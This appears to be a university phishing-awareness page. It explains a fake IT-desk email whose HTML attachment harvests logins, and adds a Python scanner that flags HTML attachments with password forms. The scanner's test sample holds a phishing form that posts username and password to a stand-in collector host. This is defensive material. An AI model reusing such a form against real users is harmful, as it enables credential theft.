Phish Bait: IT-Desk:-Incident #45277251-New Messages Will Return!


 

What makes this a phishing message?

This phishing email was sent from a compromised Auburn email account. An HTML document is attached, and the message instructs you to open it and follow its instructions to avoid losing messages. Several clues in the email should raise suspicion. Although the email originated from an Auburn sender, the sender is a student email account. The email will not be flagged as [Ext], but you should not expect this type of message from that sender. Additionally, the attached file is an HTML document that includes a form. Once you complete the form and click submit, your credentials are sent to the threat actor. It is suspicious that a webpage is attached to the email instead of being linked. Finally, the message is both generic ("Dear User") and urgent, prompting you to act to "avoid losing incoming messages and restrictions."

Tips if Something Seems Off:
Double-check the email address and sender before responding.
Look to make sure the email address is correct, and the sender is someone who would be expected to send that type of email. An Auburn email account could be compromised and should not be trusted by default. Verify that the sender is someone who would be communicating with you about the subject of the email.

Watch out for suspicious attachments, especially webpages (htm or html).
Threat actors use attachments to avoid email security features that inspect websites linked in the email body. Some attachments take the form of webpages (HTML documents) or images of QR codes (which send you to the malicious address). A document that asks you to complete a form and press submit will send that information to the threat actor. Verify that any webpage sent as an attachment is both expected and legitimate.

Follow up with the sender separately or verify the contents by some other means.
If you didn’t expect it, reject it. Or follow up with the individual directly in a separate email or call/text to confirm. Check with your IT provider or official Auburn University news sources for any unexpected requests.
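
For mail administrators, the attachment tip above can be turned into an automated check. The following is an added example, not part of the original page or any Auburn tooling: it opens each HTML attachment in a message and reports those containing a form with a password field, along with the address the form would submit to. The sample message, its addresses and the collector.example.net URL are constructed.

```python
# Added example: flag HTML attachments that hold a login-style form.
from email import message_from_string, policy
from html.parser import HTMLParser

SAMPLE = """\
From: student@example.edu
Subject: IT-Desk notice (constructed sample)
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Dear User, open the attachment to avoid losing incoming messages.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="notice.html"

<html><body><form action="https://collector.example.net/post" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>
--b1--
"""

class FormScanner(HTMLParser):
    """Records each form's action URL and whether a password field exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw):
    """Return one finding per HTML attachment that holds a password form."""
    findings = []
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        if not is_html and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", errors="replace")
        scanner = FormScanner()
        scanner.feed(body)
        if scanner.actions and scanner.has_password:
            findings.append({"filename": name, "form_actions": scanner.actions})
    return findings
```

Calling scan_message(SAMPLE) returns a single finding for notice.html. An HTML attachment with no password field produces no finding.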

Original Message

Email Screenshot

Warning

The links and email addresses included in these messages are from real-life examples. Do not attempt to explore them.
The most dangerous links have been removed - you can hover your cursor over these links to see the original address in a pop-up techtip (instead of in the corner of the browser window).